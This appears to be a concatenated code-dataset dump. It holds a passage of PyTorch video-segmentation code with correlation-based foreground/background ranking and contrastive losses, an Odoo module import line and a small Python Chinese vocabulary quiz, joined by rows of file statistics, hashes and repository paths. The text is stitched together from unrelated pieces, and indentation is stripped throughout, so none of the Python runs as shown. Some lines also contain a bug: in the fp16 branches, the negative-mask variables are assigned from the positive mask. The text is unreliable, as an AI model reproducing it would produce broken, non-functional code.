# BG_BG.append(self.correlate(1-m2_rep[b_iter].view(-1, 1, 1, 1),1-m2_rep[b_iter:b_iter+1]))
# FG_FG = torch.cat(FG_FG,dim=0)
# FG_BG = torch.cat(FG_BG,dim=0)
# BG_FG = torch.cat(BG_FG,dim=0)
# BG_BG = torch.cat(BG_BG,dim=0)
# Score addition for machting to FG a lot and penalty for matching to BG
# We are computing FG discriminant score
# For each pixel in WxH, we can take max or average across non zero channels
# FG_disc_score = f.max_pool2d(FG_FG * self_corr_R, self_corr_R.size()[2::]).view(-1, 1, W0*H0)
# FG_disc_score *= f.relu(\
# -torch.log( (0.000001+f.avg_pool2d(BG_FG * self_corr_R, self_corr_R.size()[2::]).view(-1, 1, W0*H0))/\
# (f.avg_pool2d(BG_FG , self_corr_R.size()[2::]).view(-1, 1, W0*H0) + 0.000001)\
# )\
# )
# num_pixels = 5
# temp_corr = self_corr_R * m2_rep.view(1,W0*H0,1,1)
# FG_disc_score = (temp_corr*m2_rep).reshape(1,-1,W0*H0)
# FG_disc_score, _ = FG_disc_score.sort(descending=True, dim=2)
# FG_disc_score = FG_disc_score[:,:,:num_pixels]
# FG_disc_score = FG_disc_score.sum(dim=2)/(num_pixels)
# FG_neg_score = (temp_corr*(1-m2_rep)).reshape(1,-1,W0*H0)
# FG_neg_score, _ = FG_neg_score.sort(descending=True, dim=2)
# FG_neg_score = FG_neg_score[:,:,:num_pixels]
# FG_neg_score = FG_neg_score.sum(dim=2)/(num_pixels)
# FG_disc_score -= FG_neg_score/2
# del _
# max_only = max_only + FG_disc_score.view(-1,1,W0*H0)*scale_factor
######### Addition by VJ done #################
# Rank & select FG
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# Merge net FG
corr_fores = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
if max_obj == 1: # only bg
print('missing obj')
corr_backs = torch.zeros(corr_fores.size()).cuda()
else:
'''
backs_idx = Corr_subs[0:idy] + Corr_subs[idy + 1::]
corr_b = torch.cat(backs_idx, 1)
R_map_b = Rmaps[0:idy] + Rmaps[idy + 1::]
R_map_b = torch.cat(R_map_b, 2)
'''
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_b = (1-m2_rep.view(m2_rep.size()[0], -1, 1, 1) )* corr_R
R_map_b = (R_map * (1-m2_rep)).view(-1, 1, W0*H0)
########## Above added by VJ ###########
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(R_map_b.size()[0], 1, -1) + R_map_b
########################################### VJ
# temp_corr = self_corr_R * (1-m2_rep.view(1,W0*H0,1,1))
# BG_disc_score = (temp_corr*(1-m2_rep)).reshape(1,-1,W0*H0)
# BG_disc_score, _ = BG_disc_score.sort(descending=True, dim=2)
# BG_disc_score = BG_disc_score[:,:,:num_pixels]
# BG_disc_score = BG_disc_score.sum(dim=2)/(num_pixels)
# BG_neg_score = (temp_corr*m2_rep).reshape(1,-1,W0*H0)
# BG_neg_score, _ = BG_neg_score.sort(descending=True, dim=2)
# BG_neg_score = BG_neg_score[:,:,:num_pixels]
# BG_neg_score = BG_neg_score.sum(dim=2)/(num_pixels)
# BG_disc_score -= BG_neg_score/2
# del _
# max_only_b = max_only_b + BG_disc_score*scale_factor
############################################ VJ
# Rank & select BG
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# Merge net BG
corr_backs = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
if idy == 0:
tmp = corr_fores
corr_fores = corr_backs
corr_backs = tmp
m_p = f.adaptive_avg_pool2d(Mp_all, corr_fores.size()[-2::])
else:
m_p = f.adaptive_avg_pool2d(Mps[idy], corr_fores.size()[-2::])
# low level features
base1 = torch.cat([basef1[idx: idx + 1], corr_fores, corr_backs, m_p], 1)
fea1 = self.R1(base1)
base2 = torch.cat([basef2[idx: idx + 1],
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([basef3[idx: idx + 1],
fea2], 1)
fea3 = self.R3(base3)
out = f.sigmoid(fea3)
### For each object in the image, create an out map
Outs.append(out)
Out = torch.cat(Outs, 1)
############### Once we have out map for all objects in an image, append it to a per image list
Out_Rs.append(Out)
features = []
out = [Out_Rs]
return out, features
def RANet_Multiple_forward_train(self, template, target, template_msk, target_msk,scale_factor=0):
'''
From training pass, what we want are:
1. Final predicted masks, to do cross entropy loss with target masks
2. Self correlation matrix (With features) and self mask correlation (FG vs FG , FGvsBG for each object in a frame).
This is to compute the loss for FG features not close to each other and FG features close to BG
3. Target correlation matrix (With features) and target mask correlation (FG vs FG , FGvsBG for each object in
a frame). This is to compute the loss for FG features not close to each other and FG features close to BG
4. Correlation matrix with target frame and mask correlation matrix with target frame (FG vs FG , FGvsBG for each
object in a frame). This is again to compute the loss for FG features not close to each other and FG features
close to BG
1 is expected to update mask prediction network more and 2,3 & 4 are expected to update feature extraction network
'''
# device = self.base_model.conv1.weight.device
# Exact template features
base_features2 = self.res_forward(template)
Kernel_3 = f.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = f.normalize(self.L4(base_features2[3]))
Kernel_5 = f.normalize(f.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = f.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
Kernel = Kernel_tmp
# Current frame feature
base_features1 = self.res_forward(target)
Feature_3 = f.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = f.normalize(self.L4(base_features1[3]))
Feature_5 = f.normalize(f.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = f.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
Out_Rs = []
basef1 = torch.cat([self.ls13(base_features1[2]),
self.ls14(base_features1[3]),
self.ls15(base_features1[4]), ], 1)
basef2 = torch.cat([self.ls22(base_features1[1]),
self.ls23(base_features1[2]),
self.ls24(base_features1[3]), ], 1)
basef3 = torch.cat([self.ls31(base_features1[0]),
self.ls32(base_features1[1]),
self.ls33(base_features1[2])], 1)
loss_per_batch = []
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m1 = target_msk[idx: idx + 1]
m2 = template_msk[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(f.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
M1s = self.P2masks(f.relu(m1 - 1), max_obj - 1)
M1_all = m1.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
# Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
template_self_corr = self.correlate(ker_R, ker)
target_self_corr = self.correlate(self.to_kernel(feature), feature)
# Ranking attention scores
T_corr = f.max_pool2d(corr_R,2).view(-1, W0*H0, W*H//4).transpose(1, 2).view(-1, W*H//4, W0, H0)
R_map = f.relu(self.Ranking(T_corr)) * 0.2
# Rmaps = []
# for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
# m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
# corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
# Corr_subs.append(corr_sub)
# Rmaps.append((R_map * m2_rep).view(-1, 1, W0*H0))
Outs = []
loss_per_obj = []
# print("kernel device:", ker.device, "corr_R device:", corr_R.device)
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Rmap_idy = (R_map * m2_rep).view(-1, 1, W0*H0)
co_size = corr.size()[2::]
max_only, indices = f.max_pool2d(corr, co_size, return_indices=True)
max_only = max_only.view(-1, 1, W0*H0) + Rmap_idy #Rmaps[idy]
#### For FG, adjust scores based on how close a pixel is to rest of the FG pixes and far away from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: For WxH map with FG pixels, the channels have non zerovalue where
# channel id corresponds to BG != 0
############# Loss for adjusting feature extractor
loss_obj_dict = {}
loss_obj_dict['template_FB_FB_loss'] = 0
loss_obj_dict['template_FB_BG_loss'] = 0
loss_obj_dict['target_FB_FB_loss'] = 0
loss_obj_dict['target_FB_BG_loss'] = 0
loss_obj_dict['tt_FB_FB_loss'] = 0
loss_obj_dict['tt_FB_BG_loss'] = 0
######### For each FG pixel, find closest 5 pixels in FG and sum them up. That is the -ve loss for FG-FG
num_pixels= 5
# ############################## Just template frame
# m2_rep_pos = m2_rep.ge(0.5).float()
# m2_rep_neg = m2_rep.le(0).float()
# if (self.fp16):
# m2_rep_pos = m2_rep_pos.half()
# m2_rep_neg = m2_rep_pos.half()
# indices = torch.nonzero(m2_rep_pos.reshape(-1))
# if (len(indices)>0):
# temp_corr = torch.cat([template_self_corr[:,index,:] for index in indices], dim=1)
# FB_FB_loss = (temp_corr*m2_rep_pos).reshape(1,-1,W0*H0)
# FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
# FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
# FB_BG_loss = (temp_corr*m2_rep_neg).reshape(1,-1,W0*H0)
# FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
# FB_BG_loss = FB_BG_loss[:,:,:num_pixels]
# FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
# FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
# del _
# else:
# FB_FB_loss = 0
# FB_BG_loss = 0
# loss_obj_dict['template_FB_FB_loss'] = -FB_FB_loss
# loss_obj_dict['template_FB_BG_loss'] = FB_BG_loss
# del indices
# ############################## Just target frame
# m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
# m1_rep_pos = m1_rep.ge(0.5).float()
# m1_rep_neg = m1_rep.le(0).float()
# if (self.fp16):
# m1_rep_pos = m1_rep_pos.half()
# m1_rep_neg = m1_rep_pos.half()
# indices = torch.nonzero(m1_rep_pos.reshape(-1))
# if (len(indices)>0):
# temp_corr = torch.cat([target_self_corr[:,index,:] for index in indices], dim=1)
# FB_FB_loss = (temp_corr*m1_rep_pos).reshape(1,-1,W*H)
# FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
# FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
# FB_BG_loss = (temp_corr*m1_rep_neg).reshape(1,-1,W*H)
# FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
# FB_BG_loss = FB_BG_loss[:,:,:num_pixels]
# FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
# FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
# del _
# else :
# FB_FB_loss = 0
# FB_BG_loss = 0
# loss_obj_dict['target_FB_FB_loss'] = -FB_FB_loss
# loss_obj_dict['target_FB_BG_loss'] = FB_BG_loss
# del indices
############################## Between template and target
######### Skip this if there are too many objects
if (idy < 0):
m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
m1_rep_pos = m1_rep.ge(0.5).float()
m1_rep_neg = m1_rep.le(0).float()
m2_rep_pos = m2_rep.ge(0.5).float()
m2_rep_neg = m2_rep.le(0).float()
#### Between FG of template and FG of target
# corr_R is of shape: batch_size x W0*H0 x W x H
# We want FG of both to be close and FG-BG of both to be far
FB_FB_loss = (corr_R*m1_rep_pos).reshape(-1,W0*H0,W*H)
indices1 = torch.nonzero(m1_rep_pos.reshape(-1))
indices2 = torch.nonzero(m2_rep_pos.reshape(-1))
corr_R_transpose = corr_R.view(-1, W0*H0, W*H).transpose(1, 2).view(-1, W*H, W0, H0)
if (len(indices1)>0):
FB_FB_loss1, _ = FB_FB_loss.squeeze().transpose(0,1).sort(descending=True, dim=1)
FB_FB_loss1 = torch.cat([FB_FB_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_FB_loss1 = FB_FB_loss1.sum()/(len(indices1)*num_pixels)
FB_BG_loss1 = (corr_R_transpose*m1_rep_neg).reshape(-1,W*H,W0*H0)
FB_BG_loss1, _ = FB_BG_loss1.squeeze().sort(descending=True, dim=1)
FB_BG_loss1 = torch.cat([FB_BG_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_BG_loss1 = FB_BG_loss1.sum()/(len(indices1)*num_pixels)
del _
else:
FB_FB_loss1 = 0
FB_BG_loss1 = 0
if (len(indices2)>0):
FB_FB_loss2, _ = FB_FB_loss.squeeze().sort(descending=True, dim=1)
FB_FB_loss2 = torch.cat([FB_FB_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_FB_loss2 = FB_FB_loss2.sum()/(len(indices2)*num_pixels)
FB_BG_loss2 = (corr_R*m2_rep_neg).reshape(-1,W0*H0,W*H)
FB_BG_loss2, _ = FB_BG_loss2.squeeze().sort(descending=True, dim=1)
FB_BG_loss2 = torch.cat([FB_BG_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_BG_loss2 = FB_BG_loss2.sum()/(len(indices2)*num_pixels)
del _
else:
FB_FB_loss2 = 0
FB_BG_loss2 = 0
loss_obj_dict['tt_FB_FB_loss'] = -(FB_FB_loss1 + FB_FB_loss2)/2
loss_obj_dict['tt_FB_BG_loss'] = (FB_BG_loss1 + FB_BG_loss2)/2
del indices1,indices2
loss_obj_dict['tt_FB_FB_loss'] = loss_obj_dict['tt_FB_FB_loss']*3 # To compensate for normalization
loss_obj_dict['tt_FB_BG_loss'] = loss_obj_dict['tt_FB_BG_loss']*3 # To compensate for normalization
loss_per_obj.append(loss_obj_dict)
# Score addition for machting to FG a lot and penalty for matching to BG
# We are computing FG discriminant score
# For each pixel in WxH, we can take max or average across non zero channels
# print("template_self_corr shape:",template_self_corr.shape,"m2 rep shape:", m2_rep.shape)
temp_corr = template_self_corr.data * m2_rep.view(1,W0*H0,1,1).data
FG_disc_score = (temp_corr*m2_rep.data).reshape(1,-1,W0*H0)
FG_disc_score, _ = FG_disc_score.sort(descending=True, dim=2)
FG_disc_score = FG_disc_score[:,:,:num_pixels]
FG_disc_score = FG_disc_score.sum(dim=2)/(num_pixels)
FG_neg_score = (temp_corr*(1-m2_rep.data)).reshape(1,-1,W0*H0)
FG_neg_score, _ = FG_neg_score.sort(descending=True, dim=2)
FG_neg_score = FG_neg_score[:,:,:num_pixels]
FG_neg_score = FG_neg_score.sum(dim=2)/(num_pixels)
FG_disc_score -= FG_neg_score/2
del _
max_only = max_only + FG_disc_score.view(-1,1,W0*H0)*scale_factor
######### Addition by VJ done #################
# Rank & select FG
m_sorted, m_sorted_idx = max_only.sort(descending=True, dim=2)
corr = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr, m_sorted_idx)])
# Merge net FG
corr_fores = self.p_2(self.res_1(self.p_1(f.interpolate(corr, scale_factor=2, mode='bilinear',align_corners=True))))
if max_obj == 1: # only bg
print('missing obj')
corr_backs = torch.zeros(corr_fores.size()).cuda()
else:
'''
backs_idx = Corr_subs[0:idy] + Corr_subs[idy + 1::]
corr_b = torch.cat(backs_idx, 1)
R_map_b = Rmaps[0:idy] + Rmaps[idy + 1::]
R_map_b = torch.cat(R_map_b, 2)
'''
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_b = (1-m2_rep.view(m2_rep.size()[0], -1, 1, 1) )* corr_R
R_map_b = (R_map * (1-m2_rep)).view(-1, 1, W0*H0)
########## Above added by VJ ###########
max_only_b, indices = f.max_pool2d(corr_b, co_size, return_indices=True)
max_only_b = max_only_b.view(R_map_b.size()[0], 1, -1) + R_map_b
########################################### VJ
num_pixels = 5
temp_corr = template_self_corr.data * (1-m2_rep.data.view(1,W0*H0,1,1))
BG_disc_score = (temp_corr*(1-m2_rep.data)).reshape(1,-1,W0*H0)
BG_disc_score, _ = BG_disc_score.sort(descending=True, dim=2)
BG_disc_score = BG_disc_score[:,:,:num_pixels]
BG_disc_score = BG_disc_score.sum(dim=2)/(num_pixels)
BG_neg_score = (temp_corr*m2_rep.data).reshape(1,-1,W0*H0)
BG_neg_score, _ = BG_neg_score.sort(descending=True, dim=2)
BG_neg_score = BG_neg_score[:,:,:num_pixels]
BG_neg_score = BG_neg_score.sum(dim=2)/(num_pixels)
BG_disc_score -= BG_neg_score/2
del _
max_only_b = max_only_b + BG_disc_score*scale_factor
############################################ VJ
# Rank & select BG
m_sorted, m_sorted_idx = max_only_b.sort(descending=True, dim=2)
corr_b = torch.cat([co.index_select(0, m_sort[0, 0:256]).unsqueeze(0) for co, m_sort in zip(corr_b, m_sorted_idx)])
# Merge net BG
corr_backs = self.p_2(self.res_1(self.p_1(f.interpolate(corr_b, scale_factor=2, mode='bilinear',align_corners=True))))
if idy == 0:
tmp = corr_fores
corr_fores = corr_backs
corr_backs = tmp
m_2 = f.adaptive_avg_pool2d(M2_all, corr_fores.size()[-2::])
else:
m_2 = f.adaptive_avg_pool2d(M2s[idy], corr_fores.size()[-2::])
# low level features
base1 = torch.cat([basef1[idx: idx + 1], corr_fores, corr_backs, m_2], 1)
fea1 = self.R1(base1)
base2 = torch.cat([basef2[idx: idx + 1],
fea1], 1)
fea2 = self.R2(base2)
base3 = torch.cat([basef3[idx: idx + 1],
fea2], 1)
fea3 = self.R3(base3)
# out = torch.sigmoid(fea3)
out = fea3
### For each object in the image, create an out map
Outs.append(out)
Out = torch.cat(Outs, 1)
############### Once we have out map for all objects in an image, append it to a per image list
Out_Rs.append(Out)
loss_per_batch.append(loss_per_obj)
return Out_Rs, []#loss_per_batch
def forward_feat_extractor(self, template, target, template_msk, target_msk, cap=0):
#Exact template features
base_features2 = self.res_forward(template)
Kernel_3 = F.normalize(f.max_pool2d(self.L3(base_features2[2]), 2))
Kernel_4 = F.normalize(self.L4(base_features2[3]))
Kernel_5 = F.normalize(F.interpolate(self.L5(base_features2[4]), scale_factor=2, mode='bilinear',align_corners=True))
Kernel_tmp = F.normalize(self.L_g(torch.cat([Kernel_3, Kernel_4, Kernel_5], dim=1)))
Kernel = Kernel_tmp
# Current frame feature
base_features1 = self.res_forward(target)
Feature_3 = F.normalize(f.max_pool2d(self.L3(base_features1[2]), 2))
Feature_4 = F.normalize(self.L4(base_features1[3]))
Feature_5 = F.normalize(F.interpolate(self.L5(base_features1[4]), scale_factor=2, mode='bilinear',align_corners=True))
Feature = F.normalize(self.L_g(torch.cat([Feature_3, Feature_4, Feature_5], dim=1)))
loss_per_batch = []
for idx in range(len(Feature)): # batch
ker = Kernel_tmp[idx: idx + 1]
feature = Feature[idx: idx + 1]
m1 = target_msk[idx: idx + 1]
m2 = template_msk[idx: idx + 1]
max_obj = m2.max().int().data.cpu().numpy()
if max_obj < 2:
m2[0, 0, 0, 0] = 2
max_obj = m2.max().int().data.cpu().numpy()
M2s = self.P2masks(F.relu(m2 - 1), max_obj - 1)
M2_all = m2.ge(1.5).float()
M1s = self.P2masks(f.relu(m1 - 1), max_obj - 1)
M1_all = m1.ge(1.5).float()
# Correlation
W0, H0 = ker.size()[-2::]
W,H = feature.size()[-2::]
Corr_subs = []
ker_R = self.to_kernel(ker)
corr_R = self.correlate(ker_R, feature)
template_self_corr = self.correlate(ker_R, ker)
target_self_corr = self.correlate(self.to_kernel(feature), feature)
for idy in range(max_obj): # make corrs (backgrounds(=1) and objs)
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
corr_sub = m2_rep.view(m2_rep.size()[0], -1, 1, 1) * corr_R
Corr_subs.append(corr_sub)
Outs = []
loss_per_obj = []
for idy in range(1, max_obj): # training:with_bg, testing: w/o BG
corr = Corr_subs[idy]
co_size = Corr_subs[idy].size()[2::]
#### For FG, adjust scores based on how close a pixel is to rest of the FG pixes and far away from BG pixels
# Self correlation is of size: batch_size x W*H x W x H
# We want the final score to be a score on each pixel and thus of dimension: batch_size x W*H x 1 x 1
# Notation meaning: FG_BG: For WxH map with FG pixels, the channels have non zerovalue where
# channel id corresponds to BG != 0
m2_rep = f.adaptive_avg_pool2d(M2s[idy], ker.size()[-2::])
############# Loss for adjusting feature extractor
loss_obj_dict = {}
loss_obj_dict['template_FB_FB_loss'] = 0
loss_obj_dict['template_FB_BG_loss'] = 0
loss_obj_dict['target_FB_FB_loss'] = 0
loss_obj_dict['target_FB_BG_loss'] = 0
loss_obj_dict['tt_FB_FB_loss'] = 0
loss_obj_dict['tt_FB_BG_loss'] = 0
######### For each FG pixel, find closest 5 pixels in FG and sum them up. That is the -ve loss for FG-FG
num_pixels= 5
############################## Just template frame
m2_rep_pos = m2_rep.ge(0.5).float()
m2_rep_neg = m2_rep.le(0).float()
if (self.fp16):
m2_rep_pos = m2_rep_pos.half()
m2_rep_neg = m2_rep_pos.half()
indices = torch.nonzero(m2_rep_pos.reshape(-1))
if (len(indices)>0):
temp_corr = torch.cat([template_self_corr[:,index,:] for index in indices], dim=1)
FB_FB_loss = (temp_corr*m2_rep_pos).reshape(1,-1,W0*H0)
FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
FB_BG_loss = (temp_corr*m2_rep_neg).reshape(1,-1,W0*H0)
FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
FB_BG_loss = torch.clamp(FB_BG_loss[:,:,:num_pixels]-cap, min=0)
FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
del _
else:
FB_FB_loss = 0
FB_BG_loss = 0
loss_obj_dict['template_FB_FB_loss'] = -FB_FB_loss
loss_obj_dict['template_FB_BG_loss'] = FB_BG_loss
del indices
############################## Just target frame
m1_rep = f.adaptive_avg_pool2d(M1s[idy], ker.size()[-2::])
m1_rep_pos = m1_rep.ge(0.5).float()
m1_rep_neg = m1_rep.le(0).float()
if (self.fp16):
m1_rep_pos = m1_rep_pos.half()
m1_rep_neg = m1_rep_pos.half()
indices = torch.nonzero(m1_rep_pos.reshape(-1))
if (len(indices)>0):
temp_corr = torch.cat([target_self_corr[:,index,:] for index in indices], dim=1)
FB_FB_loss = (temp_corr*m1_rep_pos).reshape(1,-1,W*H)
FB_FB_loss, _ = FB_FB_loss.sort(descending=True, dim=2)
FB_FB_loss = FB_FB_loss[:,:,:num_pixels]
FB_BG_loss = (temp_corr*m1_rep_neg).reshape(1,-1,W*H)
FB_BG_loss, _ = FB_BG_loss.sort(descending=True, dim=2)
FB_BG_loss = torch.clamp(FB_BG_loss[:,:,:num_pixels]-cap, min=0)
FB_FB_loss = FB_FB_loss.sum()/(len(indices)*num_pixels)
FB_BG_loss = FB_BG_loss.sum()/(len(indices)*num_pixels)
del _
else :
FB_FB_loss = 0
FB_BG_loss = 0
loss_obj_dict['target_FB_FB_loss'] = -FB_FB_loss
loss_obj_dict['target_FB_BG_loss'] = FB_BG_loss
del indices
############################## Between template and target
######### Skip this if there are too many objects
if (max_obj < 10):
#### Between FG of template and FG of target
# corr_R is of shape: batch_size x W0*H0 x W x H
# We want FG of both to be close and FG-BG of both to be far
FB_FB_loss = (corr_R*m1_rep_pos).reshape(-1,W0*H0,W*H)
indices1 = torch.nonzero(m1_rep_pos.reshape(-1))
indices2 = torch.nonzero(m2_rep_pos.reshape(-1))
corr_R_transpose = corr_R.view(-1, W0*H0, W*H).transpose(1, 2).view(-1, W*H, W0, H0)
if (len(indices1)>0):
FB_FB_loss1, _ = FB_FB_loss.squeeze().transpose(0,1).sort(descending=True, dim=1)
FB_FB_loss1 = torch.cat([FB_FB_loss1[index,:num_pixels] for index in indices1], dim=0)
FB_FB_loss1 = FB_FB_loss1.sum()/(len(indices1)*num_pixels)
FB_BG_loss1 = (corr_R_transpose*m1_rep_neg).reshape(-1,W*H,W0*H0)
FB_BG_loss1, _ = FB_BG_loss1.squeeze().sort(descending=True, dim=1)
FB_BG_loss1 = torch.clamp(\
torch.cat([FB_BG_loss1[index,:num_pixels] for index in indices1], dim=0)-cap, min=0)
FB_BG_loss1 = FB_BG_loss1.sum()/(len(indices1)*num_pixels)
del _
else:
FB_FB_loss1 = 0
FB_BG_loss1 = 0
if (len(indices2)>0):
FB_FB_loss2, _ = FB_FB_loss.squeeze().sort(descending=True, dim=1)
FB_FB_loss2 = torch.cat([FB_FB_loss2[index,:num_pixels] for index in indices2], dim=0)
FB_FB_loss2 = FB_FB_loss2.sum()/(len(indices2)*num_pixels)
FB_BG_loss2 = (corr_R*m2_rep_neg).reshape(-1,W0*H0,W*H)
FB_BG_loss2, _ = FB_BG_loss2.squeeze().sort(descending=True, dim=1)
FB_BG_loss2 = torch.clamp(\
torch.cat([FB_BG_loss2[index,:num_pixels] for index in indices2], dim=0)-cap, min=0)
FB_BG_loss2 = FB_BG_loss2.sum()/(len(indices2)*num_pixels)
del _
else:
FB_FB_loss2 = 0
FB_BG_loss2 = 0
loss_obj_dict['tt_FB_FB_loss'] = -(FB_FB_loss1 + FB_FB_loss2)/2
loss_obj_dict['tt_FB_BG_loss'] = (FB_BG_loss1 + FB_BG_loss2)/2
del indices1,indices2
loss_per_obj.append(loss_obj_dict)
### Loss per object done
#### Append for loss per image
loss_per_batch.append(loss_per_obj)
return loss_per_batch | 50.905512 | 138 | 0.528616 | 7,145 | 51,720 | 3.579006 | 0.058502 | 0.013452 | 0.017519 | 0.024636 | 0.85402 | 0.835953 | 0.814758 | 0.784413 | 0.776044 | 0.757234 | 0 | 0.05398 | 0.340932 | 51,720 | 1,016 | 139 | 50.905512 | 0.696219 | 0.228094 | 0 | 0.609907 | 0 | 0 | 0.018782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.03096 | false | 0.001548 | 0.020124 | 0 | 0.086687 | 0.009288 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
54ec368686010f7332842630dc7e7a015ec50fdb | 47 | py | Python | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | th_address/models/__init__.py | anndream/odoo-docker-training-v14-v2 | 7ef8f714ab151d61502d79f53badc3367335653f | [
"MIT"
] | null | null | null | from . import models, res_company, res_partner
| 23.5 | 46 | 0.808511 | 7 | 47 | 5.142857 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.12766 | 47 | 1 | 47 | 47 | 0.878049 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
54f463dde5a70f0fd5feb3989e62c98e8adfb945 | 40,845 | py | Python | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | Chinses_Word_Generator/Generator.py | CasioKing/Level-up-your-Mandarin-Chinese | cfadeaa288afdc795c92180f7a7501e91ec824e9 | [
"MIT"
] | null | null | null | import random
import time
# This is where your score will be kept
score = 0
total = 0
# Here is the data for all the characters/words used in the program
def word_1(word='水'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('Shui')
if answer.lower() == 'Shui'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return '"Empty your mind, be formless, shapeless-like water."-Bruce Lee\n'
def word_2(word='电视'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianShi')
if answer.lower() == 'DianShi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means TV\n'
def word_3(word='手机'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('ShouJi')
if answer.lower() == 'ShouJi'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means cell phone\n'
def word_4(word='电脑'):
global total
global score
print(word)
print('Can you tell me this character?')
answer = input()
if answer.lower() == 'idk'.lower():
print('DianNao')
if answer.lower() == 'DianNao'.lower():
print('correct')
score += 1
else:
print('wrong')
total += 1
time.sleep(1)
return 'This means computer\n'
